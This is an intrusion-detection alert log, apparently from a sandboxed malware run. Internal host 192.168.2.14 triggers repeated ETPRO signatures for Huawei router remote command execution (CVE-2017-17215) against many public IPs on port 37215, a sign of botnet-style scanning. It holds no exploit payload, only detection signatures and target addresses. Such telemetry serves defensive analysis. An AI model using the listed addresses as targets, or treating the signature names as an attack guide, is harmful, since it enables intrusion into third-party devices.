                                                    07/10/24-08:27:10.617343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5487237215192.168.2.14197.165.125.206
                                                    07/10/24-08:27:19.240664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4368637215192.168.2.1441.88.85.77
                                                    07/10/24-08:27:22.777206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550037215192.168.2.14133.111.60.159
                                                    07/10/24-08:27:22.784576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832037215192.168.2.14197.87.219.31
                                                    07/10/24-08:26:14.626049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754837215192.168.2.1441.161.185.105
                                                    07/10/24-08:26:11.190243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582837215192.168.2.14157.51.85.78
                                                    07/10/24-08:26:38.633686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5590437215192.168.2.14197.18.57.161
                                                    07/10/24-08:26:11.149844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5245037215192.168.2.14197.251.154.46
                                                    07/10/24-08:26:45.663934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4157437215192.168.2.1441.197.59.233
                                                    07/10/24-08:26:47.844499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5300037215192.168.2.1441.189.27.230
                                                    07/10/24-08:27:02.720199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3407837215192.168.2.1441.14.209.22
                                                    07/10/24-08:27:05.102100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424037215192.168.2.14183.161.211.151
                                                    07/10/24-08:27:19.163791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484037215192.168.2.14197.143.89.117
                                                    07/10/24-08:26:43.881879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4672437215192.168.2.14197.130.212.234
                                                    07/10/24-08:26:31.108287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793837215192.168.2.14197.49.91.45
                                                    07/10/24-08:26:36.429054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812037215192.168.2.1441.212.23.35
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292837215192.168.2.14197.160.123.205
                                                    07/10/24-08:26:53.172651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5706437215192.168.2.1418.94.182.243
                                                    07/10/24-08:27:08.446106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125637215192.168.2.14197.15.215.233
                                                    07/10/24-08:26:18.014654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826837215192.168.2.14197.97.126.193
                                                    07/10/24-08:26:13.761894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4350637215192.168.2.14157.17.22.189
                                                    07/10/24-08:27:32.580487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440037215192.168.2.14157.106.209.99
                                                    07/10/24-08:26:41.502919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972437215192.168.2.1441.111.139.76
                                                    07/10/24-08:26:43.567021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311237215192.168.2.1441.227.246.76
                                                    07/10/24-08:26:55.369458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993637215192.168.2.14157.253.174.78
                                                    07/10/24-08:26:20.151751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520837215192.168.2.1441.90.116.98
                                                    07/10/24-08:27:19.146990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831437215192.168.2.14185.135.101.136
                                                    07/10/24-08:27:28.177023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954037215192.168.2.14157.66.35.62
                                                    07/10/24-08:26:28.768053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4098237215192.168.2.1441.234.239.67
                                                    07/10/24-08:27:27.168343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250837215192.168.2.14157.220.242.247
                                                    07/10/24-08:26:25.505910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689837215192.168.2.14157.161.115.217
                                                    07/10/24-08:27:30.538369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914237215192.168.2.1474.192.224.247
                                                    07/10/24-08:26:59.688567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5929237215192.168.2.1446.154.19.96
                                                    07/10/24-08:27:02.958280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092837215192.168.2.14157.141.80.160
                                                    07/10/24-08:26:47.953100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4775437215192.168.2.14160.213.248.65
                                                    07/10/24-08:27:10.612080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445637215192.168.2.1441.139.174.122
                                                    07/10/24-08:27:20.453874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3378637215192.168.2.14157.242.90.255
                                                    07/10/24-08:26:57.586022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030437215192.168.2.14197.199.11.127
                                                    07/10/24-08:26:53.180230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182237215192.168.2.14157.236.63.237
                                                    07/10/24-08:26:55.369458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900837215192.168.2.1451.55.237.176
                                                    07/10/24-08:27:02.865689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481037215192.168.2.14157.222.208.206
                                                    07/10/24-08:26:14.624667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696237215192.168.2.14218.155.109.158
                                                    07/10/24-08:27:08.352248TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5603237215192.168.2.14197.140.168.181
                                                    07/10/24-08:27:24.988498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5106237215192.168.2.14197.34.128.58
                                                    07/10/24-08:27:33.687075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128637215192.168.2.14157.191.90.161
                                                    07/10/24-08:26:14.775624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6096637215192.168.2.14197.130.77.169
                                                    07/10/24-08:26:23.359081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192237215192.168.2.14157.244.89.205
                                                    07/10/24-08:26:28.696210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654437215192.168.2.14197.132.204.252
                                                    07/10/24-08:27:30.522162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626237215192.168.2.1441.245.237.91
                                                    07/10/24-08:26:59.526504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152637215192.168.2.14157.167.117.130
                                                    07/10/24-08:26:13.668084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979437215192.168.2.14197.242.25.28
                                                    07/10/24-08:26:45.636858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490837215192.168.2.14197.156.122.20
                                                    07/10/24-08:26:41.421188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5655037215192.168.2.1441.108.41.48
                                                    07/10/24-08:26:42.154105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3718237215192.168.2.1441.222.176.72
                                                    07/10/24-08:27:23.822671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967237215192.168.2.14165.240.15.20
                                                    07/10/24-08:26:33.239188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135837215192.168.2.142.13.222.90
                                                    07/10/24-08:27:10.642879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5835437215192.168.2.14197.172.28.211
                                                    07/10/24-08:26:11.661383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066237215192.168.2.1441.9.90.125
                                                    07/10/24-08:26:42.395679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3641837215192.168.2.14206.254.155.140
                                                    07/10/24-08:26:49.907599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4395637215192.168.2.14145.15.143.233
                                                    07/10/24-08:27:19.191147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020037215192.168.2.14197.186.81.59
                                                    07/10/24-08:27:14.881342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355837215192.168.2.14143.14.153.76
                                                    07/10/24-08:26:14.721683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4781037215192.168.2.14157.173.63.20
                                                    07/10/24-08:27:22.915722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034637215192.168.2.1441.30.61.126
                                                    07/10/24-08:26:53.200630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584037215192.168.2.14157.56.125.138
                                                    07/10/24-08:26:31.106288TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.14191.174.109.44
                                                    07/10/24-08:26:20.182553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5076637215192.168.2.1462.94.12.221
                                                    07/10/24-08:26:47.749012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727037215192.168.2.14157.162.5.13
                                                    07/10/24-08:27:07.254962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290637215192.168.2.14157.127.40.106
                                                    07/10/24-08:26:11.593481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3801437215192.168.2.14157.133.236.121
                                                    07/10/24-08:26:14.621724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791837215192.168.2.14197.195.182.19
                                                    07/10/24-08:26:52.011560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840837215192.168.2.14109.221.89.21
                                                    07/10/24-08:27:13.867822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922437215192.168.2.14157.186.226.249
                                                    07/10/24-08:27:30.538016TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229237215192.168.2.1484.82.143.164
                                                    07/10/24-08:27:14.860796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5615037215192.168.2.14137.240.129.16
                                                    07/10/24-08:27:20.483064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961837215192.168.2.14197.224.57.99
                                                    07/10/24-08:27:28.165302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310837215192.168.2.1441.250.216.115
                                                    07/10/24-08:27:05.112679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.144.249.170.250
                                                    07/10/24-08:26:52.013363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449837215192.168.2.1441.14.39.170
                                                    07/10/24-08:27:10.657807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523437215192.168.2.14157.40.128.250
                                                    07/10/24-08:27:30.472766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.14170.12.20.63
                                                    07/10/24-08:26:53.191310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798837215192.168.2.14197.45.146.79
                                                    07/10/24-08:26:20.165176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5794637215192.168.2.14157.78.112.83
                                                    07/10/24-08:27:23.920658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082037215192.168.2.14197.112.242.55
                                                    07/10/24-08:27:22.838932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978637215192.168.2.1441.79.104.83
                                                    07/10/24-08:26:25.519019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3418037215192.168.2.14197.86.150.160
                                                    07/10/24-08:26:34.251063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433837215192.168.2.14157.1.111.64
                                                    07/10/24-08:26:41.477579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513037215192.168.2.1461.17.184.183
                                                    07/10/24-08:26:43.932722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5393837215192.168.2.1420.202.165.54
                                                    07/10/24-08:26:52.068814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.1441.128.191.26
                                                    07/10/24-08:27:05.199033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3948637215192.168.2.1482.169.30.207
                                                    07/10/24-08:27:33.772276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951837215192.168.2.14126.32.157.155
                                                    07/10/24-08:26:49.824367TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592637215192.168.2.14116.50.78.23
                                                    07/10/24-08:26:51.961222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150637215192.168.2.14157.110.198.120
                                                    07/10/24-08:26:52.002515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571437215192.168.2.1441.157.168.76
                                                    07/10/24-08:26:17.950473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668037215192.168.2.14157.176.77.178
                                                    07/10/24-08:26:48.021338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4952037215192.168.2.1441.142.115.36
                                                    07/10/24-08:26:49.850247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4607837215192.168.2.1441.237.102.222
                                                    07/10/24-08:27:27.083011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443837215192.168.2.14197.77.136.170
                                                    07/10/24-08:27:08.415966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3831437215192.168.2.14157.40.117.187
                                                    07/10/24-08:26:45.576227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615637215192.168.2.14157.215.53.166
                                                    07/10/24-08:26:14.739677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523237215192.168.2.14157.147.122.219
                                                    07/10/24-08:26:33.222774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181837215192.168.2.14116.157.195.170
                                                    07/10/24-08:26:53.124303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3328037215192.168.2.14157.58.189.87
                                                    07/10/24-08:26:57.640182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3487237215192.168.2.14197.59.31.22
                                                    07/10/24-08:27:14.801528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885237215192.168.2.14197.161.83.25
                                                    07/10/24-08:27:19.278203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332237215192.168.2.14197.50.81.208
                                                    07/10/24-08:26:53.161578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4667837215192.168.2.14157.31.234.13
                                                    07/10/24-08:27:20.506153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630237215192.168.2.1441.187.30.214
                                                    07/10/24-08:26:33.204564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5117037215192.168.2.14197.74.147.131
                                                    07/10/24-08:27:33.768377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863637215192.168.2.1441.205.225.5
                                                    07/10/24-08:27:27.148686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3441637215192.168.2.14197.229.111.161
                                                    07/10/24-08:27:23.912574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884837215192.168.2.14149.158.212.11
                                                    07/10/24-08:26:28.679594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861437215192.168.2.14197.37.158.114
                                                    07/10/24-08:26:11.658896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435837215192.168.2.14197.189.249.195
                                                    07/10/24-08:26:44.496105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915437215192.168.2.14197.53.149.228
                                                    07/10/24-08:27:05.133691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399237215192.168.2.14197.199.6.240
                                                    07/10/24-08:27:13.867298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126237215192.168.2.14157.210.237.235
                                                    07/10/24-08:27:22.810848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3813437215192.168.2.14197.218.27.86
                                                    07/10/24-08:26:43.893458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3678037215192.168.2.14197.216.10.202
                                                    07/10/24-08:26:47.909611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4700837215192.168.2.14217.57.178.206
                                                    07/10/24-08:26:55.440683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3999437215192.168.2.14197.146.175.242
                                                    07/10/24-08:27:07.397388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039237215192.168.2.1441.227.108.116
                                                    07/10/24-08:27:28.093264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.1482.102.27.251
                                                    07/10/24-08:27:14.665617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3735037215192.168.2.14197.104.196.80
                                                    07/10/24-08:26:49.853206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556637215192.168.2.14117.110.245.60
                                                    07/10/24-08:26:14.771474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016237215192.168.2.14176.199.79.189
                                                    07/10/24-08:26:33.161951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3820237215192.168.2.14157.179.9.72
                                                    07/10/24-08:26:43.800438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338237215192.168.2.14197.104.106.207
                                                    07/10/24-08:27:14.837323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3396837215192.168.2.14197.12.229.151
                                                    07/10/24-08:26:42.406060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3554237215192.168.2.1441.78.2.138
                                                    07/10/24-08:26:15.862104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734237215192.168.2.14157.55.230.87
                                                    07/10/24-08:26:26.593421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826637215192.168.2.14157.45.55.106
                                                    07/10/24-08:26:51.960962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5279637215192.168.2.14152.14.181.15
                                                    07/10/24-08:27:19.216648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100237215192.168.2.1441.227.179.150
                                                    07/10/24-08:26:36.339943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4533037215192.168.2.14157.108.80.140
                                                    07/10/24-08:27:30.436856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603837215192.168.2.1441.170.24.99
                                                    07/10/24-08:26:55.429801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500437215192.168.2.14197.68.42.30
                                                    07/10/24-08:26:55.332211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810437215192.168.2.14197.255.242.2
                                                    07/10/24-08:27:07.384495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355437215192.168.2.14157.117.159.216
                                                    07/10/24-08:26:11.538222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3583037215192.168.2.1441.174.50.70
                                                    07/10/24-08:26:41.516990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4803637215192.168.2.14157.224.91.93
                                                    07/10/24-08:26:43.907475TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794237215192.168.2.1441.112.54.244
                                                    07/10/24-08:27:24.973099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857237215192.168.2.14197.215.68.249
                                                    07/10/24-08:26:29.881507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263237215192.168.2.1441.110.109.95
                                                    07/10/24-08:26:47.821657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381837215192.168.2.1441.95.229.177
                                                    07/10/24-08:27:19.184506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699237215192.168.2.1441.45.123.217
                                                    07/10/24-08:27:27.051851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4792237215192.168.2.14197.77.169.110
                                                    07/10/24-08:27:33.810872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560237215192.168.2.1441.163.207.210
                                                    07/10/24-08:26:13.659815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131837215192.168.2.1460.167.215.107
                                                    07/10/24-08:26:23.297905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3769637215192.168.2.14205.86.211.52
                                                    07/10/24-08:26:43.692447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093237215192.168.2.1441.218.225.201
                                                    07/10/24-08:26:38.605259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277037215192.168.2.14157.248.116.161
                                                    07/10/24-08:27:07.393644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4752237215192.168.2.14157.53.141.49
                                                    07/10/24-08:27:22.903995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3488237215192.168.2.14157.71.89.80
                                                    07/10/24-08:27:10.707207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241437215192.168.2.14157.56.208.82
                                                    07/10/24-08:26:14.771474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584437215192.168.2.1491.94.11.112
                                                    07/10/24-08:26:31.058453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5065237215192.168.2.14197.132.38.9
                                                    07/10/24-08:27:10.609490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984037215192.168.2.14157.53.118.157
                                                    07/10/24-08:26:15.827757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5090237215192.168.2.14197.160.231.121
                                                    07/10/24-08:27:10.542013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371237215192.168.2.1441.204.100.129
                                                    07/10/24-08:26:23.335498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996437215192.168.2.14157.221.178.57
                                                    07/10/24-08:26:36.378421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4796037215192.168.2.1441.76.128.31
                                                    07/10/24-08:26:31.102239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919637215192.168.2.14157.13.37.69
                                                    07/10/24-08:26:11.611492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3927237215192.168.2.1441.9.195.101
                                                    07/10/24-08:27:13.863038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781637215192.168.2.14157.130.178.114
                                                    07/10/24-08:27:11.479148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3631037215192.168.2.14197.215.186.222
                                                    07/10/24-08:27:22.532374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230437215192.168.2.14158.142.141.18
                                                    07/10/24-08:26:29.869473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828037215192.168.2.14157.99.134.241
                                                    07/10/24-08:27:30.527827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748037215192.168.2.14157.10.68.80
                                                    07/10/24-08:26:43.756816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3539637215192.168.2.14197.215.240.23
                                                    07/10/24-08:27:13.835787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392037215192.168.2.14154.48.100.111
                                                    07/10/24-08:26:25.519002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826637215192.168.2.1441.235.40.199
                                                    07/10/24-08:26:28.901857TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396637215192.168.2.1441.253.11.18
                                                    07/10/24-08:27:22.929262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3891237215192.168.2.1419.231.39.114
                                                    07/10/24-08:27:20.439109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303237215192.168.2.14197.62.214.236
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432837215192.168.2.14197.176.3.220
                                                    07/10/24-08:26:17.999668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803837215192.168.2.14157.105.44.174
                                                    07/10/24-08:26:57.628977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3939637215192.168.2.1441.19.158.94
                                                    07/10/24-08:27:07.362026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4269437215192.168.2.14155.226.124.133
                                                    07/10/24-08:26:33.243765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4878637215192.168.2.14137.193.38.46
                                                    07/10/24-08:27:31.447886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3705437215192.168.2.14139.118.46.99
                                                    07/10/24-08:26:38.565091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4365837215192.168.2.14197.94.215.8
                                                    07/10/24-08:26:23.322361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648637215192.168.2.142.26.131.103
                                                    07/10/24-08:26:49.829856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017237215192.168.2.1441.9.213.250
                                                    07/10/24-08:27:14.861604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4164437215192.168.2.1451.163.223.177
